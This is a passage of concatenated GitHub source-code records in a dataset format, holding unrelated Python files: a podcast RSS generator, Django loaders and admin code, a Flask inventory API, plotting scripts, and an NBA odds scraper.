SubElement(item, 'pubDate').text = publish_date\n SubElement(item, 'itunes:duration').text = duration\n SubElement(item, 'itunes:episodeType').text = episode_type_text\n SubElement(item, 'link').text = cloudfront_content + urllib.parse.quote(each_s3_object['Key'])\n\n # retrieve episode media URL ###################################################################################\n media_resource = each_s3_object['Key']\n media_url = cloudfront_content + urllib.parse.quote(media_resource)\n SubElement(item, 'enclosure', url=media_url, length=str(each_s3_object['Size']), type='audio/mpeg')\n SubElement(item, 'guid').text = cloudfront_content + urllib.parse.quote(media_resource)\n\n # iterate through S3 objects and retrieve episode information ######################################################\n for each_s3_object in content_list['Contents']:\n if '.mp3' in each_s3_object['Key']:\n get_episode_info(each_s3_object, cloudfront_content)\n\n if '.m4a' in each_s3_object['Key']:\n get_episode_info(each_s3_object, cloudfront_content)\n\n # upload the podcast.xml file to S3 ################################################################################\n create_podcast_file_content = prettify(rss)\n s3_bucket_object.put_object(\n Bucket=s3_bucket_rss,\n Body=create_podcast_file_content,\n Key=podcast_xml_file_name,\n ContentType='application/xml'\n )\n\n\ndef handler(event, context):\n make_feed()\n","repo_name":"goehlemichael/terraform-podcast","sub_path":"modules/aws_podcast/podcast.py","file_name":"podcast.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40604063706","text":"import os\nimport map\nimport zipfile\nfrom django.contrib.gis.gdal import DataSource\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import Road, SchoolDistrict\n\nelsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'ELSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\nscsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'SCSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\nunsd = {\n 'statefp' : 'STATEFP',\n 'lea' : 'UNSDLEA',\n 'geoid' : 'GEOID',\n 'name' : 'NAME',\n 'lsad' : 'LSAD',\n 'lograde' : 'LOGRADE',\n 'higrade' : 'HIGRADE',\n 'mtfcc' : 'MTFCC',\n 'sdtyp' : 'SDTYP',\n 'funcstat' : 'FUNCSTAT',\n 'aland' : 'ALAND',\n 'awater' : 'AWATER',\n 'intptlat' : 'INTPTLAT',\n 'intptlon' : 'INTPTLON',\n 'geom' : 'MULTIPOLYGON',\n}\n\nmappings={'unsd':unsd,'scsd':scsd,'elsd':elsd}\n\ndata = os.path.join(os.path.dirname(map.__file__),'data')\n# Auto-generated `LayerMapping` dictionary for Road model\ndef run(verbose=True):\n \"\"\"\n for county in os.listdir(data):\n lm = LayerMapping(\n Road, os.path.join(data,county,county+'.shp'), road_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)\n \"\"\"\n for z in os.listdir(data+'/zipped/'):\n zipname = z[:len(z)-4]\n zf = zipfile.ZipFile(data+'/zipped/'+z,mode='r')\n 
zf.extractall(path=os.path.join(data,'unzipped',zipname))\n shp=os.path.join(data,'unzipped',zipname,zipname+'.shp')\n distype = zipname[len(zipname)-4:]\n\n\n lm = LayerMapping(\n SchoolDistrict, shp, mappings[distype],\n transform=False, encoding='iso-8859-1',\n )\n\n lm.save(strict=True, verbose=verbose,progress=True)\n","repo_name":"joreymelinder/snakeroute","sub_path":"map/loadDistricts.py","file_name":"loadDistricts.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632900670","text":"from django.contrib import admin\nfrom .models import Company\n\n\n@admin.register(Company)\nclass CompanyAdmin(admin.ModelAdmin):\n fieldsets = (\n ('Current Company', {\n \"fields\": (\n ('cnpj', 'fantasy_name'), ('social_reason',\n 'state_registration'), 'open_date', 'address', 'logo'\n ),\n }),\n )\n raw_id_fields = ('address',)\n list_display = ('id', 'fantasy_name', 'social_reason',\n 'cnpj', 'state_registration', 'open_date', 'address')\n search_fields = ('fantasy_name', 'cnpj')\n","repo_name":"linkinn/projectBBK","sub_path":"apps/company/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22554284862","text":"import os, sys, logging, json \nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\ndef make_logger(log):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n \n # formatter\n file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s:%(lineno)d] -- %(message)s\")\n # file_handler\n file_handler = logging.FileHandler(log, mode='w')\n file_handler.setFormatter(file_formatter)\n file_handler.setLevel(logging.INFO)\n # logger.add\n logger.addHandler(file_handler)\n \n return logger\n\ndef makeOutputPath(file_path, file_dir, output_dir, Ext):\n root, file = os.path.split(file_path)\n filename, ext = os.path.splitext(file)\n relpath = os.path.relpath(file_path, file_dir)\n mid_dir = os.path.split(relpath)[0]\n output_path = os.path.join(output_dir, mid_dir, f\"{filename}.{Ext}\")\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n\n return output_path\n\ndef readJson(path):\n with open(path, 'r', encoding='utf-8') as f:\n data = json.load(f)\n return data\n\ndef saveJson(file, path):\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(file, f, indent=2, ensure_ascii=False)\n \ndef readfiles(dir):\n file_dict = defaultdict(list)\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n ext = ext.lower() \n if ext == '.json':\n folder = os.path.split(root)[-1]\n file_path = os.path.join(root, file)\n\n file_dict[folder].append(file_path)\n\n return file_dict\n\ndef get_objects(data):\n obj = data['objects']\n\n if type(obj) == dict:\n obj = [obj]\n\n return obj\n\ndef collect_objects(folder, path):\n data = readJson(path)\n obj = get_objects(data)\n for o in obj:\n _class = o['class']\n _sub_class1 = o[\"sub_class1\"]\n _sub_class2 = o[\"sub_class2\"]\n _id = o['HDP_VRFC']['id']\n \n count_dict[folder][_id].append({'path':path, 'class':_class, 'sub_class1':_sub_class1, 'sub_class2':_sub_class2}) \n\ndef revise_objects(count_dict, folder, path, output_path):\n data = readJson(path)\n if type(data['objects']) == list:\n for idx, o in enumerate(data['objects']):\n _id = o['HDP_VRFC']['id']\n value = count_dict[folder][_id]\n front = 
o['include_class']['front']\n if data['objects'][idx]['class'] != value['class'] or data['objects'][idx][\"sub_class1\"] != value['sub_class1'] or data['objects'][idx][\"sub_class2\"] != value['sub_class2']:\n data['objects'][idx]['class'] = value['class']\n data['objects'][idx][\"sub_class1\"] = value['sub_class1']\n data['objects'][idx][\"sub_class2\"] = value['sub_class2']\n revise_list.append([path, output_path])\n if front:\n if front[0]['class'] != value['class'].split(' ')[0] or front[0]['sub_class1'] != value['sub_class1'] or front[0]['sub_class2'] != value['sub_class2']:\n front[0]['class'] = value['class'].split(' ')[0]\n front[0]['sub_class1'] = value['sub_class1']\n front[0]['sub_class2'] = value['sub_class2']\n revise_list.append([path, output_path])\n\n elif type(data['objects']) == dict:\n _id = data['objects']['HDP_VRFC']['id']\n value = count_dict[folder][_id]\n front = data['objects']['include_class']['front']\n \n if data['objects'][idx]['class'] != value['class'] or data['objects'][idx][\"sub_class1\"] != value['sub_class1'] or data['objects'][idx][\"sub_class2\"] != value['sub_class2']:\n data['objects']['class'] = value['class']\n data['objects'][\"sub_class1\"] = value['sub_class1']\n data['objects'][\"sub_class2\"] = value['sub_class2']\n revise_list.append([path, output_path])\n\n if front:\n if front[0]['class'] != value['class'].split(' ')[0] or front[0]['sub_class1'] != value['sub_class1'] or front[0]['sub_class2'] != value['sub_class2']:\n front[0]['class'] = value['class'].split(' ')[0]\n front[0]['sub_class1'] = value['sub_class1']\n front[0]['sub_class2'] = value['sub_class2']\n revise_list.append([path, output_path])\n\n saveJson(data, output_path)\n \ndef get_max_value(_list, key):\n data = [i[key] for i in _list]\n val = max(set(data), key=data.count)\n return val\n \ndef sorted_dict(_dict):\n for f, _i in _dict.items():\n for i, c in _i.items():\n if len(c) <= 2:\n for j in c:\n special_list.append([f, j['path'], i])\n \n _class = get_max_value(c, 'class')\n _sub_class1 = get_max_value(c, 'sub_class1')\n _sub_class2 = get_max_value(c, 'sub_class2')\n\n _dict[f][i] = {'class':_class, 'sub_class1':_sub_class1, 'sub_class2':_sub_class2}\n \n return _dict\n\ndef make_excel(_list, col, output_excel_path):\n df = pd.DataFrame(_list, columns=col)\n df.to_excel(output_excel_path, index=False)\n \nif __name__ == \"__main__\":\n _, input_dir, output_dir = sys.argv\n \n logger = make_logger('in_id_log.log')\n \n json_dict = readfiles(input_dir)\n\n count_dict = defaultdict(lambda : defaultdict(list))\n\n for folder, json_path_list in tqdm(json_dict.items(), desc='collecting id..!'):\n for json_path in json_path_list:\n logger.info(f\"{json_path} collecting id\")\n collect_objects(folder, json_path)\n \n special_list = []\n count_dict = sorted_dict(count_dict)\n \n revise_list = []\n for folder, json_path_list in tqdm(json_dict.items(), desc='revise class..!'):\n for json_path in json_path_list:\n logger.info(f\"{json_path} revise class\")\n output_json_path = makeOutputPath(json_path, input_dir, output_dir, 'json')\n revise_objects(count_dict, folder, json_path, output_json_path)\n \n make_excel(special_list, ['sequence', 'file_path', 'id'], f\"{output_dir}/special_list.xlsx\")\n make_excel(revise_list, ['input_file_path', 'output_file_path'], f\"{output_dir}/revise_list.xlsx\")\n \n\n 
","repo_name":"tkdalsrb123/Alchera","sub_path":"11/1122_json_revise_error_class/revise_error_class.py","file_name":"revise_error_class.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2624185153","text":"import matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imread\n\nimg = imread(\"Cat.jpg\") #зчитування зображення\n\nimg_ = img/255\nimg_gray = img_ @ [0.3, 0.59, 0.11]\n\nhist_ = img_gray.flatten()\nplt.hist(x = hist_, bins=256, color='gray', label='перехід до відтінків сірого') #побудова гістрограми переходу до відтінків сірого\n\nplt.legend(loc='best') #лагенда\nplt.suptitle('Task 4\\n Гістрограма переходу до відтінків сірого') #визначення заголовків\nplt.show()","repo_name":"TylBohdan/yopi","sub_path":"kgvproject/Task4_4.py","file_name":"Task4_4.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31384726277","text":"with open('outofplace.in','r') as fin:\n lines=fin.readlines()\n\nn=int(lines[0])\nheights=[int(line) for line in lines[1:]]\n#sort heights\nsorted_heights=sorted(heights)\n\nresult=-1\n#iterate through heights and sorted heights\nfor i in range(len(heights)):\n #swap every time the heights in both lists are different\n if heights[i]!=sorted_heights[i]:\n result+=1\n\nwith open('outofplace.out','w') as fout:\n fout.write(str(max(0,result))+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2017-18/bronze/jan/outofplace.py","file_name":"outofplace.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15773133804","text":"import numpy\nfrom matplotlib import pyplot\n\n\ndef draw_points_on_map(map_file, points_file, bounds, output):\n import json\n with open(points_file) as f:\n points = json.load(f)\n\n from PIL import Image\n Image.MAX_IMAGE_PIXELS = 192000000\n\n image = Image.open(map_file)\n dpi = 80\n import matplotlib.pyplot as plt\n # plt.rcParams.update({'font.size': 60})\n\n fig, ax = plt.subplots(figsize=(image.width / dpi, image.height / dpi), dpi=dpi)\n ax.imshow(image, origin=\"upper\", extent=bounds, aspect=\"auto\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"left\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(False)\n ax.set_xticks(numpy.linspace(*bounds[0:2], 10))\n ax.set_yticks(numpy.linspace(*bounds[2:4], 10))\n\n points = []\n\n for i, point in enumerate(points):\n ax.scatter(*point,\n marker=\"v\",\n s=1000,\n color=(1.0, 1.0, 1.0),\n label=f\"{i}\")\n ax.annotate(str(i), point)\n\n fig.tight_layout()\n ax.set_xlim(bounds[0], bounds[1])\n ax.set_ylim(bounds[2], bounds[3])\n ax.set_xlabel(\"h\")\n ax.set_ylabel(\"α\")\n\n fig.tight_layout()\n fig.savefig(output)\n pyplot.close(fig)\n\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_001_inc_20200518-162846.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_001.png\"\n# )\n\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_0001_inc_20200518-163151.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_0001.png\"\n# )\n\n# draw_points_on_map(\n# \"../../COURSEWORK_DATA/OLD_MAPS/final_00001_inc_20200518-163457.png\",\n# \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n# (-6, 0, 
0.5, 1.0),\n# \"../../COURSEWORK_DATA/map_00001.png\"\n# )\n\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_0.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_0.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_01.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_01.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_001.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_0001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_0001.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_00001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_8+1.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_16+1.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_16+1.png\"\n)\n","repo_name":"modelflat/coursework","sub_path":"research/map_with_points.py","file_name":"map_with_points.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30833262893","text":"from api.db import db\nfrom api.models import User, Location, LocationMember, Item, ItemStock, \\\n ItemLog, ItemStockLog\nfrom api.auth import current_user_id\nfrom api.error import error\nfrom flask import Blueprint, request, jsonify, g\nfrom api.validation import list_parser, simple_parser\nfrom api.control import control\nfrom uuid import uuid4\n\nlocations = Blueprint('locations', __name__, url_prefix='/v1/locations')\n\n\n@locations.before_request\ndef prefetch_location():\n if 'location_id' in request.view_args:\n location_id = request.view_args['location_id']\n location = Location.query.get(location_id)\n if location_id is None:\n return error.not_found('Could not find location')\n g.location = location\n\n\n@locations.route('', methods=['POST'])\n@control.authorize(['user'])\ndef create_location():\n args = simple_parser() \\\n .add_argument('owner_id', required=True) \\\n .add_argument('name', required=True) \\\n .parse_args()\n\n owner_id = args['owner_id']\n\n user = User.query.get(owner_id)\n\n if user is None:\n return error.not_found('User not found')\n\n location = Location(owner_id=user.id, name=args['name'])\n\n db.session.add(location)\n db.session.commit()\n\n return jsonify(location.to_dict())\n\n\n@locations.route('', methods=['GET'])\n@control.authorize(['user'])\ndef list_locations():\n args = list_parser().parse_args()\n user_id = current_user_id()\n locations = Location \\\n .query \\\n .outerjoin(LocationMember) \\\n .filter(\n LocationMember.user_id == user_id or\n Location.owner_id == user_id) \\\n .offset(args['offset']) \\\n .limit(args['limit']) \\\n .all()\n\n return jsonify([location.to_dict() for location in locations])\n\n\n@locations.route('//members/', methods=['POST'])\n@control.authorize(['owner'])\ndef add_location_member(location_id, member_id):\n member = LocationMember(user_id=member_id, location_id=location_id)\n 
db.session.add(member)\n db.session.commit()\n return jsonify(member.to_dict())\n\n\n@locations.route('//members')\n@control.authorize(['location'])\ndef list_location_members(location_id):\n args = list_parser().parse_args()\n members = User \\\n .query \\\n .join(LocationMember, LocationMember.user_id == User.id) \\\n .filter(LocationMember.location_id == location_id) \\\n .offset(args['offset']) \\\n .limit(args['limit']) \\\n .all()\n\n return jsonify([member.to_dict() for member in members])\n\n\n@locations.route('//members/', methods=['DELETE'])\n@control.authorize(['owner'])\ndef delete_location_member(location_id, member_id):\n affected_records = LocationMember \\\n .query \\\n .filter(\n LocationMember.location_id == location_id\n and LocationMember.user_id == member_id) \\\n .delete()\n\n if affected_records < 1:\n return error.not_found(\n 'Cannot delete user as he is not a member of the location')\n return ('', 200)\n\n\n@locations.route('//items', methods=['POST'])\n@control.authorize(['location'])\ndef add_location_item(location_id):\n args = simple_parser() \\\n .add_argument('name', required=True) \\\n .add_argument('price', type=float, required=True) \\\n .add_argument('quantity', type=int, required=True) \\\n .parse_args()\n\n item = Item(name=args['name'], price=args['price'], version=str(uuid4()))\n db.session.add(item)\n db.session.flush()\n\n item_log = ItemLog(\n item_version=item.version,\n item_id=item.id,\n name=item.name,\n price=item.price\n )\n db.session.add(item_log)\n\n item_stock = ItemStock(\n item_id=item.id,\n location_id=location_id,\n quantity=args['quantity'],\n version=str(uuid4())\n )\n db.session.add(item_stock)\n db.session.flush()\n\n item_stock_log = ItemStockLog(\n item_id=item.id,\n item_version=item.version,\n item_stock_version=item_stock.version,\n location_id=item_stock.location_id,\n quantity=item_stock.quantity\n )\n db.session.add(item_stock_log)\n\n db.session.commit()\n\n return jsonify(item.with_stock(item_stock))\n\n\n@locations.route('//items/', methods=['PUT'])\n@control.authorize(['location'])\ndef update_location_item(location_id, item_id):\n item_modified = False\n stock_modfied = False\n\n args = simple_parser() \\\n .add_argument('name', required=True) \\\n .add_argument('price', type=float, required=True) \\\n .add_argument('quantity', type=int, required=True) \\\n .parse_args()\n\n item = Item.query.get(item_id)\n if item.name != args['name'] or item.name != args['price']:\n item_modified = True\n last_version = item.version\n item.name = args['name']\n item.price = args['price']\n item.version = str(uuid4())\n db.session.add(item)\n\n item_log = ItemLog(\n item_version=item.version,\n last_item_version=last_version,\n item_id=item.id,\n name=item.name,\n price=item.price\n )\n db.session.add(item_log)\n\n item_stock = ItemStock \\\n .query \\\n .filter(ItemStock.item_id == item_id) \\\n .first()\n\n if item_stock.quantity != args['quantity']:\n stock_modfied = True\n last_version = item_stock.version\n item_stock.version = str(uuid4())\n item_stock.quantity = args['quantity']\n db.session.add(item_stock)\n\n item_stock_log = ItemStockLog(\n item_id=item.id,\n item_version=item.version,\n item_stock_version=item_stock.version,\n last_item_stock_version=last_version,\n location_id=item_stock.location_id,\n quantity=args['quantity'])\n db.session.add(item_stock_log)\n\n db.session.commit()\n\n if not item_modified and not stock_modfied:\n return error.bad_request('Did not modify record.')\n else:\n return 
jsonify(item.with_stock(item_stock))\n\n\n@locations.route('//items', methods=['GET'])\n@control.authorize(['location'])\ndef list_location_items(location_id):\n parser = list_parser()\n args = parser.parse_args()\n items = db \\\n .session \\\n .query(Item, ItemStock) \\\n .join(ItemStock) \\\n .filter(ItemStock.location_id == location_id) \\\n .limit(args['limit']) \\\n .offset(args['offset']) \\\n .all()\n\n result = [item.with_stock(item_stock) for (item, item_stock) in items]\n\n return jsonify(result)\n","repo_name":"AGhost-7/stockpiler","sub_path":"api/api/routes/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8644052766","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n\n@fusion_manager.register(\"mul_no_nan\")\ndef mul_no_nan_compute(input_x1, input_x2, output_y, kernel_name=\"mul_no_nan\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n input_x1 : TVM tensor\n the placeholder of input_x1\n input_x2 : TVM tensor\n the placeholder of input_x2\n output_y : dict\n dict of output_y, include keys(shape and dtype)\n kernel_name : str\n kernel name, default value is \"mul_no_nan\"\n\n Returns\n -------\n output tensor\n \"\"\"\n \"\"\"\n np.where(np.equal(y, 0.), np.zeros((), dtype=dtype), np.multiply(x, y))\n \"\"\"\n src_dtype = input_x1.dtype.lower()\n shape_x1 = te.lang.cce.util.shape_to_list(input_x1.shape)\n shape_x2 = te.lang.cce.util.shape_to_list(input_x2.shape)\n\n shape_x1, shape_x2, shape_max = util.produce_shapes(shape_x1, shape_x2)\n util.check_shape_size(shape_max, SHAPE_SIZE_LIMIT)\n input_x1 = te.lang.cce.broadcast(input_x1, shape_max)\n input_x2 = te.lang.cce.broadcast(input_x2, shape_max)\n\n mul_res = te.lang.cce.vmul(input_x1, input_x2)\n zero = tvm.const(0, dtype=src_dtype)\n zeros = te.lang.cce.broadcast(zero, shape_max)\n res = te.lang.cce.vcmpsel(input_x2,\n zeros,\n operation='eq',\n slhs=zeros,\n srhs=mul_res)\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_INPUT, OPTION_OUTPUT, KERNEL_NAME)\ndef mul_no_nan(x1, x2, y, kernel_name=\"mul_no_nan\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : dict\n shape and dtype of input1\n x2: dict\n shape and dtype of input2\n y : dict\n shape and dtype of output, should be same shape and type as input\n kernel_name : str\n kernel name, default value is \"mul_no_nan\"\n\n Returns\n -------\n None\n \"\"\"\n output_z = y\n shape_x1 = x1.get(\"shape\")\n shape_x2 = x2.get(\"shape\")\n\n check_tuple = (\"float16\", \"float32\", \"int32\")\n input_data_type = x1.get(\"dtype\").lower()\n check_dtype(input_data_type, check_tuple)\n\n shape_x, shape_y, shape_max = broadcast_shapes(shape_x1, shape_x2, param_name_input1=\"x1\", param_name_input2=\"x2\")\n if shape_x[-1] == 1 and shape_y[-1] == 1 and shape_max[-1] == 1:\n shape_x = shape_x if len(shape_x) == 1 else shape_x[:-1]\n shape_y = shape_y if len(shape_y) == 1 else shape_y[:-1]\n shape_max = shape_max if len(shape_max) == 1 else shape_max[:-1]\n\n check_shape(shape_max)\n\n reshape_x, reshape_y = refine_shapes_for_broadcast(shape_x, shape_y)\n data_x = tvm.placeholder(reshape_x, name=\"data_1\", dtype=input_data_type)\n data_y = tvm.placeholder(reshape_y, name=\"data_2\", dtype=input_data_type)\n res = mul_no_nan_compute(data_x, data_y, output_z, 
kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n config = {\n \"print_ir\": False,\n \"name\": kernel_name,\n \"tensor_list\": (data_x, data_y, res)\n }\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/mul_no_nan.py","file_name":"mul_no_nan.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16096097828","text":"import csv\nimport sys\nimport json\nfrom datetime import datetime\nfrom lxml import html\nimport requests\nimport math_helper as mt\n\ndef build_price_dict():\n aDict = {}\n source = requests.get('https://www.bovada.lv/services/sports/event/v2/events/A/description/basketball/nba').json()\n length = len(source[0]['events'])\n for i in range(length):\n stuff = source[0]['events'][i]\n \n eventType = stuff['type']\n if eventType == \"GAMEEVENT\":\n event = stuff['description']\n try:\n print(stuff['displayGroups'][0]['markets'][0]['outcomes'][0]['price']['american'])\n away = stuff['displayGroups'][0]['markets'][0]['outcomes'][0]['price']['american']\n home = stuff['displayGroups'][0]['markets'][0]['outcomes'][1]['price']['american']\n aDict[event] = [away, home]\n except:\n aDict[event] = [0, 0]\n continue\n return aDict\n\ndef parse_prices(awayTeam, homeTeam, price_dict):\n for i in price_dict.keys():\n if awayTeam in i and homeTeam in i:\n return price_dict[i]\n\ndef get_team_location(team):\n return{\n 'GSW' : 'golden-state-warriors',\n 'MIL' : 'milwaukee-bucks',\n 'PHI' : 'philadelphia-76ers',\n 'NOP' : 'new-orleans-pelicans',\n 'OKC' : 'oklahoma-city-thunder',\n 'TOR' : 'toronto-raptors',\n 'LAC' : 'la-clippers',\n 'WAS' : 'washington-wizards',\n 'SAC' : 'sacramento-kings',\n 'POR' : 'portland-trail-blazers',\n 'HOU' : 'houston-rockets',\n 'BOS' : 'boston-celtics',\n 'SAS' : 'san-antonio-spurs',\n 'BRK' : 'brooklyn-nets',\n 'LAL' : 'los-angeles-lakers',\n 'DEN' : 'denver-nuggets',\n 'MIN' : 'minnesota-timberwolves',\n 'CHO' : 'charlotte-hornets',\n 'ATL' : 'atlanta-hawks',\n 'UTA' : 'utah-jazz',\n 'DAL' : 'dallas-mavericks',\n 'IND' : 'indiana-pacers',\n 'DET' : 'detroit-pistons',\n 'PHO' : 'phoenix-suns',\n 'ORL' : 'orlando-magic',\n 'NYK' : 'new-york-knicks',\n 'MIA' : 'miami-heat',\n 'CHI' : 'chicago-bulls',\n 'CLE' : 'cleveland-cavaliers',\n 'MEM' : 'memphis-grizzlies',\n }.get(team)\n\ndef get_team_long(team):\n return{\n 'GSW' : 'Golden State Warriors',\n 'MIL' : 'Milwaukee Bucks',\n 'PHI' : 'Philadelphia 76ers',\n 'NOP' : 'New Orleans Pelicans',\n 'OKC' : 'Oklahoma City Thunder',\n 'TOR' : 'Toronto Raptors',\n 'LAC' : 'Los Angeles Clippers',\n 'WAS' : 'Washington Wizards',\n 'SAC' : 'Sacramento Kings',\n 'POR' : 'Portland Trail Blazers',\n 'HOU' : 'Houston Rockets',\n 'BOS' : 'Boston Celtics',\n 'SAS' : 'San Antonio Spurs',\n 'BRK' : 'Brooklyn Nets',\n 'LAL' : 'Los Angeles Lakers',\n 'DEN' : 'Denver Nuggets',\n 'MIN' : 'Minnesota Timberwolves',\n 'CHO' : 'Charlotte Hornets',\n 'ATL' : 'Atlanta Hawks',\n 'UTA' : 'Utah Jazz',\n 'DAL' : 'Dallas Mavericks',\n 'IND' : 'Indiana Pacers',\n 'DET' : 'Detroit Pistons',\n 'PHO' : 'Phoenix Suns',\n 'ORL' : 'Orlando Magic',\n 'NYK' : 'New York Knicks',\n 'MIA' : 'Miami Heat',\n 'CHI' : 'Chicago Bulls',\n 'CLE' : 'Cleveland Cavaliers',\n 'MEM' : 'Memphis Grizzlies',\n }.get(team)\n\ndef get_record(tree):\n stuff = tree.xpath('//tr[@class=\"team-blockup-data\"]//td//p/text()')\n record = stuff[0]\n dash = record.find('-')\n 
wins = int(record[:dash])\n losses = int(record[dash+1:])\n return wins+losses\n\ndef calculate_moving_team_record(tree, numGames):\n toDateWins = tree.xpath('//tr//td[@data-stat=\"wins\"]/text()')\n listOfRecord = []\n nthGame = 0\n for i in range(0, numGames):\n nthGame += 1\n listOfRecord.append(int(toDateWins[i])/nthGame)\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(numGames))\n\ndef parse_home_away(tree, numGames):\n results = tree.xpath('//tr//td/text()')\n awayWins = 0\n awayRecord = []\n awayGames = 0\n homeWins = 0\n homeRecord = []\n homeGames = 0\n for i in range((7 * numGames) - 1):\n if results[i] == '@':\n awayGames += 1\n if results[i + 1] == 'W':\n awayWins += 1\n awayRecord.append(awayWins)\n elif results[i + 1] == 'L':\n awayRecord.append(awayWins)\n if ('p' in results[i]) and (results[i+1] != '@'):\n homeGames += 1\n if results[i + 1] == 'W':\n homeWins += 1\n homeRecord.append(homeWins)\n elif results[i + 1] == 'L':\n homeRecord.append(homeWins)\n return awayRecord, homeRecord\n\ndef calculate_moving_awaygame_record(tree, numGames):\n awayRecord = parse_home_away(tree, numGames)[0]\n awayGames = len(awayRecord)\n listOfRecord = []\n nthGame = 0\n for i in range(0, awayGames):\n nthGame += 1 \n listOfRecord.append(awayRecord[i]/(nthGame))\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(awayGames))\n\ndef calculate_moving_homegame_record(tree, numGames):\n homeRecord = parse_home_away(tree, numGames)[1]\n homeGames = len(homeRecord)\n listOfRecord = []\n nthGame = 0\n for i in range(0, 